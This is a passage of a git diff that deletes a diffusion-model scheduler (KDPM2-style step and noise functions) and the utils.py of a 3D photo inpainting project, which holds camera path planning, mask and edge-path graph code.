str(device).startswith("mps"): - # mps does not support float64 - self.timesteps = timesteps.to(torch.float32) - else: - self.timesteps = timesteps - - self.sample = None - - def sigma_to_t(self, sigma): - # get log sigma - log_sigma = sigma.log() - - # get distribution - dists = log_sigma - self.log_sigmas[:, None] - - # get sigmas range - low_idx = dists.ge(0).cumsum(dim=0).argmax(dim=0).clamp(max=self.log_sigmas.shape[0] - 2) - high_idx = low_idx + 1 - - low = self.log_sigmas[low_idx] - high = self.log_sigmas[high_idx] - - # interpolate sigmas - w = (low - log_sigma) / (low - high) - w = w.clamp(0, 1) - - # transform interpolation to time range - t = (1 - w) * low_idx + w * high_idx - t = t.view(sigma.shape) - return t - - @property - def state_in_first_order(self): - return self.sample is None - - def step( - self, - model_output: Union[torch.FloatTensor, np.ndarray], - timestep: Union[float, torch.FloatTensor], - sample: Union[torch.FloatTensor, np.ndarray], - return_dict: bool = True, - ) -> Union[SchedulerOutput, Tuple]: - """ - Args: - Predict the sample at the previous timestep by reversing the SDE. Core function to propagate the diffusion - process from the learned model outputs (most often the predicted noise). - model_output (`torch.FloatTensor` or `np.ndarray`): direct output from learned diffusion model. timestep - (`int`): current discrete timestep in the diffusion chain. sample (`torch.FloatTensor` or `np.ndarray`): - current instance of sample being created by diffusion process. - return_dict (`bool`): option for returning tuple rather than SchedulerOutput class - Returns: - [`~schedulers.scheduling_utils.SchedulerOutput`] or `tuple`: - [`~schedulers.scheduling_utils.SchedulerOutput`] if `return_dict` is True, otherwise a `tuple`. When - returning a tuple, the first element is the sample tensor. - """ - step_index = self.index_for_timestep(timestep) - - if self.state_in_first_order: - sigma = self.sigmas[step_index] - sigma_interpol = self.sigmas_interpol[step_index + 1] - sigma_next = self.sigmas[step_index + 1] - else: - # 2nd order / KDPM2's method - sigma = self.sigmas[step_index - 1] - sigma_interpol = self.sigmas_interpol[step_index] - sigma_next = self.sigmas[step_index] - - # currently only gamma=0 is supported. This usually works best anyways. - # We can support gamma in the future but then need to scale the timestep before - # passing it to the model which requires a change in API - gamma = 0 - sigma_hat = sigma * (gamma + 1) # Note: sigma_hat == sigma for now - - # 1. compute predicted original sample (x_0) from sigma-scaled predicted noise - if self.config.prediction_type == "epsilon": - sigma_input = sigma_hat if self.state_in_first_order else sigma_interpol - pred_original_sample = sample - sigma_input * model_output - elif self.config.prediction_type == "v_prediction": - sigma_input = sigma_hat if self.state_in_first_order else sigma_interpol - pred_original_sample = model_output * (-sigma_input / (sigma_input**2 + 1) ** 0.5) + ( - sample / (sigma_input**2 + 1) - ) - else: - raise ValueError( - f"prediction_type given as {self.config.prediction_type} must be one of `epsilon`, or `v_prediction`" - ) - - if self.state_in_first_order: - # 2. Convert to an ODE derivative for 1st order - derivative = (sample - pred_original_sample) / sigma_hat - # 3. delta timestep - dt = sigma_interpol - sigma_hat - - # store for 2nd order step - self.sample = sample - else: - # DPM-Solver-2 - # 2. Convert to an ODE derivative for 2nd order - derivative = (sample - pred_original_sample) / sigma_interpol - - # 3. delta timestep - dt = sigma_next - sigma_hat - - sample = self.sample - self.sample = None - - prev_sample = sample + derivative * dt - - if not return_dict: - return (prev_sample,) - - return SchedulerOutput(prev_sample=prev_sample) - - def add_noise( - self, - original_samples: torch.FloatTensor, - noise: torch.FloatTensor, - timesteps: torch.FloatTensor, - ) -> torch.FloatTensor: - # Make sure sigmas and timesteps have the same device and dtype as original_samples - self.sigmas = self.sigmas.to(device=original_samples.device, dtype=original_samples.dtype) - if original_samples.device.type == "mps" and torch.is_floating_point(timesteps): - # mps does not support float64 - self.timesteps = self.timesteps.to(original_samples.device, dtype=torch.float32) - timesteps = timesteps.to(original_samples.device, dtype=torch.float32) - else: - self.timesteps = self.timesteps.to(original_samples.device) - timesteps = timesteps.to(original_samples.device) - - step_indices = [self.index_for_timestep(t) for t in timesteps] - - sigma = self.sigmas[step_indices].flatten() - while len(sigma.shape) < len(original_samples.shape): - sigma = sigma.unsqueeze(-1) - - noisy_samples = original_samples + noise * sigma - return noisy_samples - - def __len__(self): - return self.config.num_train_timesteps diff --git a/spaces/Jacks2003/3D_Photo_Inpainting/utils.py b/spaces/Jacks2003/3D_Photo_Inpainting/utils.py deleted file mode 100644 index 808e48b1979d16f32c050f43f1f6c0ca36d8d18b..0000000000000000000000000000000000000000 --- a/spaces/Jacks2003/3D_Photo_Inpainting/utils.py +++ /dev/null @@ -1,1416 +0,0 @@ -import os -import glob -import cv2 -import scipy.misc as misc -from skimage.transform import resize -import numpy as np -from functools import reduce -from operator import mul -import torch -from torch import nn -import matplotlib.pyplot as plt -import re -try: - import cynetworkx as netx -except ImportError: - import networkx as netx -from scipy.ndimage import gaussian_filter -from skimage.feature import canny -import collections -import shutil -import imageio -import copy -from matplotlib import pyplot as plt -from mpl_toolkits.mplot3d import Axes3D -import time -from scipy.interpolate import interp1d -from collections import namedtuple - -def path_planning(num_frames, x, y, z, path_type=''): - if path_type == 'straight-line': - corner_points = np.array([[0, 0, 0], [(0 + x) * 0.5, (0 + y) * 0.5, (0 + z) * 0.5], [x, y, z]]) - corner_t = np.linspace(0, 1, len(corner_points)) - t = np.linspace(0, 1, num_frames) - cs = interp1d(corner_t, corner_points, axis=0, kind='quadratic') - spline = cs(t) - xs, ys, zs = [xx.squeeze() for xx in np.split(spline, 3, 1)] - elif path_type == 'double-straight-line': - corner_points = np.array([[-x, -y, -z], [0, 0, 0], [x, y, z]]) - corner_t = np.linspace(0, 1, len(corner_points)) - t = np.linspace(0, 1, num_frames) - cs = interp1d(corner_t, corner_points, axis=0, kind='quadratic') - spline = cs(t) - xs, ys, zs = [xx.squeeze() for xx in np.split(spline, 3, 1)] - elif path_type == 'circle': - xs, ys, zs = [], [], [] - for frame_id, bs_shift_val in enumerate(np.arange(-2.0, 2.0, (4./num_frames))): - xs += [np.cos(bs_shift_val * np.pi) * 1 * x] - ys += [np.sin(bs_shift_val * np.pi) * 1 * y] - zs += [np.cos(bs_shift_val * np.pi/2.) * 1 * z] - xs, ys, zs = np.array(xs), np.array(ys), np.array(zs) - - return xs, ys, zs - -def open_small_mask(mask, context, open_iteration, kernel): - np_mask = mask.cpu().data.numpy().squeeze().astype(np.uint8) - raw_mask = np_mask.copy() - np_context = context.cpu().data.numpy().squeeze().astype(np.uint8) - np_input = np_mask + np_context - for _ in range(open_iteration): - np_input = cv2.erode(cv2.dilate(np_input, np.ones((kernel, kernel)), iterations=1), np.ones((kernel,kernel)), iterations=1) - np_mask[(np_input - np_context) > 0] = 1 - out_mask = torch.FloatTensor(np_mask).to(mask)[None, None, ...] - - return out_mask - -def filter_irrelevant_edge_new(self_edge, comp_edge, other_edges, other_edges_with_id, current_edge_id, context, depth, mesh, context_cc, spdb=False): - other_edges = other_edges.squeeze().astype(np.uint8) - other_edges_with_id = other_edges_with_id.squeeze() - self_edge = self_edge.squeeze() - dilate_bevel_self_edge = cv2.dilate((self_edge + comp_edge).astype(np.uint8), np.array([[1,1,1],[1,1,1],[1,1,1]]), iterations=1) - dilate_cross_self_edge = cv2.dilate((self_edge + comp_edge).astype(np.uint8), np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - edge_ids = np.unique(other_edges_with_id * context + (-1) * (1 - context)).astype(np.int) - end_depth_maps = np.zeros_like(self_edge) - self_edge_ids = np.sort(np.unique(other_edges_with_id[self_edge > 0]).astype(np.int)) - self_edge_ids = self_edge_ids[1:] if self_edge_ids.shape[0] > 0 and self_edge_ids[0] == -1 else self_edge_ids - self_comp_ids = np.sort(np.unique(other_edges_with_id[comp_edge > 0]).astype(np.int)) - self_comp_ids = self_comp_ids[1:] if self_comp_ids.shape[0] > 0 and self_comp_ids[0] == -1 else self_comp_ids - edge_ids = edge_ids[1:] if edge_ids[0] == -1 else edge_ids - other_edges_info = [] - extend_other_edges = np.zeros_like(other_edges) - if spdb is True: - f, ((ax1, ax2, ax3)) = plt.subplots(1, 3, sharex=True, sharey=True); ax1.imshow(self_edge); ax2.imshow(context); ax3.imshow(other_edges_with_id * context + (-1) * (1 - context)); plt.show() - import pdb; pdb.set_trace() - filter_self_edge = np.zeros_like(self_edge) - for self_edge_id in self_edge_ids: - filter_self_edge[other_edges_with_id == self_edge_id] = 1 - dilate_self_comp_edge = cv2.dilate(comp_edge, kernel=np.ones((3, 3)), iterations=2) - valid_self_comp_edge = np.zeros_like(comp_edge) - for self_comp_id in self_comp_ids: - valid_self_comp_edge[self_comp_id == other_edges_with_id] = 1 - self_comp_edge = dilate_self_comp_edge * valid_self_comp_edge - filter_self_edge = (filter_self_edge + self_comp_edge).clip(0, 1) - for edge_id in edge_ids: - other_edge_locs = (other_edges_with_id == edge_id).astype(np.uint8) - condition = (other_edge_locs * other_edges * context.astype(np.uint8)) - end_cross_point = dilate_cross_self_edge * condition * (1 - filter_self_edge) - end_bevel_point = dilate_bevel_self_edge * condition * (1 - filter_self_edge) - if end_bevel_point.max() != 0: - end_depth_maps[end_bevel_point != 0] = depth[end_bevel_point != 0] - if end_cross_point.max() == 0: - nxs, nys = np.where(end_bevel_point != 0) - for nx, ny in zip(nxs, nys): - bevel_node = [xx for xx in context_cc if xx[0] == nx and xx[1] == ny][0] - for ne in mesh.neighbors(bevel_node): - if other_edges_with_id[ne[0], ne[1]] > -1 and dilate_cross_self_edge[ne[0], ne[1]] > 0: - extend_other_edges[ne[0], ne[1]] = 1 - break - else: - other_edges[other_edges_with_id == edge_id] = 0 - other_edges = (other_edges + extend_other_edges).clip(0, 1) * context - - return other_edges, end_depth_maps, other_edges_info - -def clean_far_edge_new(input_edge, end_depth_maps, mask, context, global_mesh, info_on_pix, self_edge, inpaint_id, config): - mesh = netx.Graph() - hxs, hys = np.where(input_edge * mask > 0) - valid_near_edge = (input_edge != 0).astype(np.uint8) * context - valid_map = mask + context - invalid_edge_ids = [] - for hx, hy in zip(hxs, hys): - node = (hx ,hy) - mesh.add_node((hx, hy)) - eight_nes = [ne for ne in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1), \ - (hx + 1, hy + 1), (hx - 1, hy - 1), (hx - 1, hy + 1), (hx + 1, hy - 1)]\ - if 0 <= ne[0] < input_edge.shape[0] and 0 <= ne[1] < input_edge.shape[1] and 0 < input_edge[ne[0], ne[1]]] # or end_depth_maps[ne[0], ne[1]] != 0] - for ne in eight_nes: - mesh.add_edge(node, ne, length=np.hypot(ne[0] - hx, ne[1] - hy)) - if end_depth_maps[ne[0], ne[1]] != 0: - mesh.nodes[ne[0], ne[1]]['cnt'] = True - if end_depth_maps[ne[0], ne[1]] == 0: - import pdb; pdb.set_trace() - mesh.nodes[ne[0], ne[1]]['depth'] = end_depth_maps[ne[0], ne[1]] - elif mask[ne[0], ne[1]] != 1: - four_nes = [nne for nne in [(ne[0] + 1, ne[1]), (ne[0] - 1, ne[1]), (ne[0], ne[1] + 1), (ne[0], ne[1] - 1)]\ - if nne[0] < end_depth_maps.shape[0] and nne[0] >= 0 and nne[1] < end_depth_maps.shape[1] and nne[1] >= 0] - for nne in four_nes: - if end_depth_maps[nne[0], nne[1]] != 0: - mesh.add_edge(nne, ne, length=np.hypot(nne[0] - ne[0], nne[1] - ne[1])) - mesh.nodes[nne[0], nne[1]]['cnt'] = True - mesh.nodes[nne[0], nne[1]]['depth'] = end_depth_maps[nne[0], nne[1]] - ccs = [*netx.connected_components(mesh)] - end_pts = [] - for cc in ccs: - end_pts.append(set()) - for node in cc: - if mesh.nodes[node].get('cnt') is not None: - end_pts[-1].add((node[0], node[1], mesh.nodes[node]['depth'])) - predef_npaths = [None for _ in range(len(ccs))] - fpath_map = np.zeros_like(input_edge) - 1 - npath_map = np.zeros_like(input_edge) - 1 - npaths, fpaths = dict(), dict() - break_flag = False - end_idx = 0 - while end_idx < len(end_pts): - end_pt, cc = [*zip(end_pts, ccs)][end_idx] - end_idx += 1 - sorted_end_pt = [] - fpath = [] - iter_fpath = [] - if len(end_pt) > 2 or len(end_pt) == 0: - if len(end_pt) > 2: - continue - continue - if len(end_pt) == 2: - ravel_end = [*end_pt] - tmp_sub_mesh = mesh.subgraph(list(cc)).copy() - tmp_npath = [*netx.shortest_path(tmp_sub_mesh, (ravel_end[0][0], ravel_end[0][1]), (ravel_end[1][0], ravel_end[1][1]), weight='length')] - fpath_map1, npath_map1, disp_diff1 = plan_path(mesh, info_on_pix, cc, ravel_end[0:1], global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None, npath=tmp_npath) - fpath_map2, npath_map2, disp_diff2 = plan_path(mesh, info_on_pix, cc, ravel_end[1:2], global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None, npath=tmp_npath) - tmp_disp_diff = [disp_diff1, disp_diff2] - self_end = [] - edge_len = [] - ds_edge = cv2.dilate(self_edge.astype(np.uint8), np.ones((3, 3)), iterations=1) - if ds_edge[ravel_end[0][0], ravel_end[0][1]] > 0: - self_end.append(1) - else: - self_end.append(0) - if ds_edge[ravel_end[1][0], ravel_end[1][1]] > 0: - self_end.append(1) - else: - self_end.append(0) - edge_len = [np.count_nonzero(npath_map1), np.count_nonzero(npath_map2)] - sorted_end_pts = [xx[0] for xx in sorted(zip(ravel_end, self_end, edge_len, [disp_diff1, disp_diff2]), key=lambda x: (x[1], x[2]), reverse=True)] - re_npath_map1, re_fpath_map1 = (npath_map1 != -1).astype(np.uint8), (fpath_map1 != -1).astype(np.uint8) - re_npath_map2, re_fpath_map2 = (npath_map2 != -1).astype(np.uint8), (fpath_map2 != -1).astype(np.uint8) - if np.count_nonzero(re_npath_map1 * re_npath_map2 * mask) / \ - (np.count_nonzero((re_npath_map1 + re_npath_map2) * mask) + 1e-6) > 0.5\ - and np.count_nonzero(re_fpath_map1 * re_fpath_map2 * mask) / \ - (np.count_nonzero((re_fpath_map1 + re_fpath_map2) * mask) + 1e-6) > 0.5\ - and tmp_disp_diff[0] != -1 and tmp_disp_diff[1] != -1: - my_fpath_map, my_npath_map, npath, fpath = \ - plan_path_e2e(mesh, cc, sorted_end_pts, global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None) - npath_map[my_npath_map != -1] = my_npath_map[my_npath_map != -1] - fpath_map[my_fpath_map != -1] = my_fpath_map[my_fpath_map != -1] - if len(fpath) > 0: - edge_id = global_mesh.nodes[[*sorted_end_pts][0]]['edge_id'] - fpaths[edge_id] = fpath - npaths[edge_id] = npath - invalid_edge_ids.append(edge_id) - else: - if tmp_disp_diff[0] != -1: - ratio_a = tmp_disp_diff[0] / (np.sum(tmp_disp_diff) + 1e-8) - else: - ratio_a = 0 - if tmp_disp_diff[1] != -1: - ratio_b = tmp_disp_diff[1] / (np.sum(tmp_disp_diff) + 1e-8) - else: - ratio_b = 0 - npath_len = len(tmp_npath) - if npath_len > config['depth_edge_dilate_2'] * 2: - npath_len = npath_len - (config['depth_edge_dilate_2'] * 1) - tmp_npath_a = tmp_npath[:int(np.floor(npath_len * ratio_a))] - tmp_npath_b = tmp_npath[::-1][:int(np.floor(npath_len * ratio_b))] - tmp_merge = [] - if len(tmp_npath_a) > 0 and sorted_end_pts[0][0] == tmp_npath_a[0][0] and sorted_end_pts[0][1] == tmp_npath_a[0][1]: - if len(tmp_npath_a) > 0 and mask[tmp_npath_a[-1][0], tmp_npath_a[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[:1], tmp_npath_a]) - if len(tmp_npath_b) > 0 and mask[tmp_npath_b[-1][0], tmp_npath_b[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[1:2], tmp_npath_b]) - elif len(tmp_npath_b) > 0 and sorted_end_pts[0][0] == tmp_npath_b[0][0] and sorted_end_pts[0][1] == tmp_npath_b[0][1]: - if len(tmp_npath_b) > 0 and mask[tmp_npath_b[-1][0], tmp_npath_b[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[:1], tmp_npath_b]) - if len(tmp_npath_a) > 0 and mask[tmp_npath_a[-1][0], tmp_npath_a[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[1:2], tmp_npath_a]) - for tmp_idx in range(len(tmp_merge)): - if len(tmp_merge[tmp_idx][1]) == 0: - continue - end_pts.append(tmp_merge[tmp_idx][0]) - ccs.append(set(tmp_merge[tmp_idx][1])) - if len(end_pt) == 1: - sub_mesh = mesh.subgraph(list(cc)).copy() - pnodes = netx.periphery(sub_mesh) - if len(end_pt) == 1: - ends = [*end_pt] - elif len(sorted_end_pt) == 1: - ends = [*sorted_end_pt] - else: - import pdb; pdb.set_trace() - try: - edge_id = global_mesh.nodes[ends[0]]['edge_id'] - except: - import pdb; pdb.set_trace() - pnodes = sorted(pnodes, - key=lambda x: np.hypot((x[0] - ends[0][0]), (x[1] - ends[0][1])), - reverse=True)[0] - npath = [*netx.shortest_path(sub_mesh, (ends[0][0], ends[0][1]), pnodes, weight='length')] - for np_node in npath: - npath_map[np_node[0], np_node[1]] = edge_id - fpath = [] - if global_mesh.nodes[ends[0]].get('far') is None: - print("None far") - else: - fnodes = global_mesh.nodes[ends[0]].get('far') - dmask = mask + 0 - did = 0 - while True: - did += 1 - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - if did > 3: - break - ffnode = [fnode for fnode in fnodes if (dmask[fnode[0], fnode[1]] > 0 and mask[fnode[0], fnode[1]] == 0 and\ - global_mesh.nodes[fnode].get('inpaint_id') != inpaint_id + 1)] - if len(ffnode) > 0: - fnode = ffnode[0] - break - if len(ffnode) == 0: - continue - fpath.append((fnode[0], fnode[1])) - barrel_dir = np.array([[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]]) - n2f_dir = (int(fnode[0] - npath[0][0]), int(fnode[1] - npath[0][1])) - while True: - if barrel_dir[0, 0] == n2f_dir[0] and barrel_dir[0, 1] == n2f_dir[1]: - n2f_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - for step in range(0, len(npath)): - if step == 0: - continue - elif step == 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_dir[0, 0] == next_dir[0] and barrel_dir[0, 1] == next_dir[1]: - next_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - barrel_pair = np.stack((n2f_barrel, next_barrel), axis=0) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - elif step > 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_pair[1, 0, 0] == next_dir[0] and barrel_pair[1, 0, 1] == next_dir[1]: - next_barrel = barrel_pair.copy() - break - barrel_pair = np.roll(barrel_pair, 1, axis=1) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - new_locs = [] - if abs(n2f_dir[0]) == 1: - new_locs.append((npath[step][0] + n2f_dir[0], npath[step][1])) - if abs(n2f_dir[1]) == 1: - new_locs.append((npath[step][0], npath[step][1] + n2f_dir[1])) - if len(new_locs) > 1: - new_locs = sorted(new_locs, key=lambda xx: np.hypot((xx[0] - fpath[-1][0]), (xx[1] - fpath[-1][1]))) - break_flag = False - for new_loc in new_locs: - new_loc_nes = [xx for xx in [(new_loc[0] + 1, new_loc[1]), (new_loc[0] - 1, new_loc[1]), - (new_loc[0], new_loc[1] + 1), (new_loc[0], new_loc[1] - 1)]\ - if xx[0] >= 0 and xx[0] < fpath_map.shape[0] and xx[1] >= 0 and xx[1] < fpath_map.shape[1]] - if np.all([(fpath_map[nlne[0], nlne[1]] == -1) for nlne in new_loc_nes]) != True: - break - if npath_map[new_loc[0], new_loc[1]] != -1: - if npath_map[new_loc[0], new_loc[1]] != edge_id: - break_flag = True - break - else: - continue - if valid_map[new_loc[0], new_loc[1]] == 0: - break_flag = True - break - fpath.append(new_loc) - if break_flag is True: - break - if step != len(npath) - 1: - for xx in npath[step:]: - if npath_map[xx[0], xx[1]] == edge_id: - npath_map[xx[0], xx[1]] = -1 - npath = npath[:step] - if len(fpath) > 0: - for fp_node in fpath: - fpath_map[fp_node[0], fp_node[1]] = edge_id - fpaths[edge_id] = fpath - npaths[edge_id] = npath - fpath_map[valid_near_edge != 0] = -1 - if len(fpath) > 0: - iter_fpath = copy.deepcopy(fpaths[edge_id]) - for node in iter_fpath: - if valid_near_edge[node[0], node[1]] != 0: - fpaths[edge_id].remove(node) - - return fpath_map, npath_map, False, npaths, fpaths, invalid_edge_ids - -def plan_path_e2e(mesh, cc, end_pts, global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None): - my_npath_map = np.zeros_like(input_edge) - 1 - my_fpath_map = np.zeros_like(input_edge) - 1 - sub_mesh = mesh.subgraph(list(cc)).copy() - ends_1, ends_2 = end_pts[0], end_pts[1] - edge_id = global_mesh.nodes[ends_1]['edge_id'] - npath = [*netx.shortest_path(sub_mesh, (ends_1[0], ends_1[1]), (ends_2[0], ends_2[1]), weight='length')] - for np_node in npath: - my_npath_map[np_node[0], np_node[1]] = edge_id - fpath = [] - if global_mesh.nodes[ends_1].get('far') is None: - print("None far") - else: - fnodes = global_mesh.nodes[ends_1].get('far') - dmask = mask + 0 - while True: - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - ffnode = [fnode for fnode in fnodes if (dmask[fnode[0], fnode[1]] > 0 and mask[fnode[0], fnode[1]] == 0 and\ - global_mesh.nodes[fnode].get('inpaint_id') != inpaint_id + 1)] - if len(ffnode) > 0: - fnode = ffnode[0] - break - e_fnodes = global_mesh.nodes[ends_2].get('far') - dmask = mask + 0 - while True: - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - e_ffnode = [e_fnode for e_fnode in e_fnodes if (dmask[e_fnode[0], e_fnode[1]] > 0 and mask[e_fnode[0], e_fnode[1]] == 0 and\ - global_mesh.nodes[e_fnode].get('inpaint_id') != inpaint_id + 1)] - if len(e_ffnode) > 0: - e_fnode = e_ffnode[0] - break - fpath.append((fnode[0], fnode[1])) - if len(e_ffnode) == 0 or len(ffnode) == 0: - return my_npath_map, my_fpath_map, [], [] - barrel_dir = np.array([[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]]) - n2f_dir = (int(fnode[0] - npath[0][0]), int(fnode[1] - npath[0][1])) - while True: - if barrel_dir[0, 0] == n2f_dir[0] and barrel_dir[0, 1] == n2f_dir[1]: - n2f_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - for step in range(0, len(npath)): - if step == 0: - continue - elif step == 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_dir[0, 0] == next_dir[0] and barrel_dir[0, 1] == next_dir[1]: - next_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - barrel_pair = np.stack((n2f_barrel, next_barrel), axis=0) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - elif step > 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_pair[1, 0, 0] == next_dir[0] and barrel_pair[1, 0, 1] == next_dir[1]: - next_barrel = barrel_pair.copy() - break - barrel_pair = np.roll(barrel_pair, 1, axis=1) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - new_locs = [] - if abs(n2f_dir[0]) == 1: - new_locs.append((npath[step][0] + n2f_dir[0], npath[step][1])) - if abs(n2f_dir[1]) == 1: - new_locs.append((npath[step][0], npath[step][1] + n2f_dir[1])) - if len(new_locs) > 1: - new_locs = sorted(new_locs, key=lambda xx: np.hypot((xx[0] - fpath[-1][0]), (xx[1] - fpath[-1][1]))) - break_flag = False - for new_loc in new_locs: - new_loc_nes = [xx for xx in [(new_loc[0] + 1, new_loc[1]), (new_loc[0] - 1, new_loc[1]), - (new_loc[0], new_loc[1] + 1), (new_loc[0], new_loc[1] - 1)]\ - if xx[0] >= 0 and xx[0] < my_fpath_map.shape[0] and xx[1] >= 0 and xx[1] < my_fpath_map.shape[1]] - if fpath_map is not None and np.sum([fpath_map[nlne[0], nlne[1]] for nlne in new_loc_nes]) != 0: - break_flag = True - break - if my_npath_map[new_loc[0], new_loc[1]] != -1: - continue - if npath_map is not None and npath_map[new_loc[0], new_loc[1]] != edge_id: - break_flag = True - break - fpath.append(new_loc) - if break_flag is True: - break - if (e_fnode[0], e_fnode[1]) not in fpath: - fpath.append((e_fnode[0], e_fnode[1])) - if step != len(npath) - 1: - for xx in npath[step:]: - if my_npath_map[xx[0], xx[1]] == edge_id: - my_npath_map[xx[0], xx[1]] = -1 - npath = npath[:step] - if len(fpath) > 0: - for fp_node in fpath: - my_fpath_map[fp_node[0], fp_node[1]] = edge_id - - return my_fpath_map, my_npath_map, npath, fpath - -def plan_path(mesh, info_on_pix, cc, end_pt, global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None, npath=None): - my_npath_map = np.zeros_like(input_edge) - 1 - my_fpath_map = np.zeros_like(input_edge) - 1 - sub_mesh = mesh.subgraph(list(cc)).copy() - pnodes = netx.periphery(sub_mesh) - ends = [*end_pt] - edge_id = global_mesh.nodes[ends[0]]['edge_id'] - pnodes = sorted(pnodes, - key=lambda x: np.hypot((x[0] - ends[0][0]), (x[1] - ends[0][1])), - reverse=True)[0] - if npath is None: - npath = [*netx.shortest_path(sub_mesh, (ends[0][0], ends[0][1]), pnodes, weight='length')] - else: - if (ends[0][0], ends[0][1]) == npath[0]: - npath = npath - elif (ends[0][0], ends[0][1]) == npath[-1]: - npath = npath[::-1] - else: - import pdb; pdb.set_trace() - for np_node in npath: - my_npath_map[np_node[0], np_node[1]] = edge_id - fpath = [] - if global_mesh.nodes[ends[0]].get('far') is None: - print("None far") - else: - fnodes = global_mesh.nodes[ends[0]].get('far') - dmask = mask + 0 - did = 0 - while True: - did += 1 - if did > 3: - return my_fpath_map, my_npath_map, -1 - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - ffnode = [fnode for fnode in fnodes if (dmask[fnode[0], fnode[1]] > 0 and mask[fnode[0], fnode[1]] == 0 and\ - global_mesh.nodes[fnode].get('inpaint_id') != inpaint_id + 1)] - if len(ffnode) > 0: - fnode = ffnode[0] - break - - fpath.append((fnode[0], fnode[1])) - disp_diff = 0. - for n_loc in npath: - if mask[n_loc[0], n_loc[1]] != 0: - disp_diff = abs(abs(1. / info_on_pix[(n_loc[0], n_loc[1])][0]['depth']) - abs(1. / ends[0][2])) - break - barrel_dir = np.array([[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]]) - n2f_dir = (int(fnode[0] - npath[0][0]), int(fnode[1] - npath[0][1])) - while True: - if barrel_dir[0, 0] == n2f_dir[0] and barrel_dir[0, 1] == n2f_dir[1]: - n2f_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - for step in range(0, len(npath)): - if step == 0: - continue - elif step == 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_dir[0, 0] == next_dir[0] and barrel_dir[0, 1] == next_dir[1]: - next_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - barrel_pair = np.stack((n2f_barrel, next_barrel), axis=0) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - elif step > 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_pair[1, 0, 0] == next_dir[0] and barrel_pair[1, 0, 1] == next_dir[1]: - next_barrel = barrel_pair.copy() - break - barrel_pair = np.roll(barrel_pair, 1, axis=1) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - new_locs = [] - if abs(n2f_dir[0]) == 1: - new_locs.append((npath[step][0] + n2f_dir[0], npath[step][1])) - if abs(n2f_dir[1]) == 1: - new_locs.append((npath[step][0], npath[step][1] + n2f_dir[1])) - if len(new_locs) > 1: - new_locs = sorted(new_locs, key=lambda xx: np.hypot((xx[0] - fpath[-1][0]), (xx[1] - fpath[-1][1]))) - break_flag = False - for new_loc in new_locs: - new_loc_nes = [xx for xx in [(new_loc[0] + 1, new_loc[1]), (new_loc[0] - 1, new_loc[1]), - (new_loc[0], new_loc[1] + 1), (new_loc[0], new_loc[1] - 1)]\ - if xx[0] >= 0 and xx[0] < my_fpath_map.shape[0] and xx[1] >= 0 and xx[1] < my_fpath_map.shape[1]] - if fpath_map is not None and np.all([(fpath_map[nlne[0], nlne[1]] == -1) for nlne in new_loc_nes]) != True: - break_flag = True - break - if np.all([(my_fpath_map[nlne[0], nlne[1]] == -1) for nlne in new_loc_nes]) != True: - break_flag = True - break - if my_npath_map[new_loc[0], new_loc[1]] != -1: - continue - if npath_map is not None and npath_map[new_loc[0], new_loc[1]] != edge_id: - break_flag = True - break - if valid_map[new_loc[0], new_loc[1]] == 0: - break_flag = True - break - fpath.append(new_loc) - if break_flag is True: - break - if step != len(npath) - 1: - for xx in npath[step:]: - if my_npath_map[xx[0], xx[1]] == edge_id: - my_npath_map[xx[0], xx[1]] = -1 - npath = npath[:step] - if len(fpath) > 0: - for fp_node in fpath: - my_fpath_map[fp_node[0], fp_node[1]] = edge_id - - return my_fpath_map, my_npath_map, disp_diff - -def refresh_node(old_node, old_feat, new_node, new_feat, mesh, stime=False): - mesh.add_node(new_node) - mesh.nodes[new_node].update(new_feat) - mesh.nodes[new_node].update(old_feat) - for ne in mesh.neighbors(old_node): - mesh.add_edge(new_node, ne) - if mesh.nodes[new_node].get('far') is not None: - tmp_far_nodes = mesh.nodes[new_node]['far'] - 